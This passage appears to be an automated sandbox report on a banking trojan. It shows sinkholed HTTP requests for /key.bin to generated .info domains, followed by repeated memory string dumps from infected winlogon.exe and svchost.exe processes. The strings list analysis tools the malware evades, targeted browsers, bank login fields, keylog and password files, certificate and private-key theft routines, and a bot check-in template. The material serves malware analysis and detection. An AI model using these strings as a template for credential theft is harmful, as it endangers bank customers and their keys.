User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mavagyte.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: viwemata.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:01 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycikoga.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: naselyfu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:57 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

The Trojan connects to the servers at the folowing location(s):

winlogon.exe_416_rwx_00B40000_000AA000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

winlogon.exe_416_rwx_00CA0000_000B9000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

C:\Windows\apppatch\xodaql.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

`.data

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_580_rwx_00BB0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_580_rwx_00C10000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

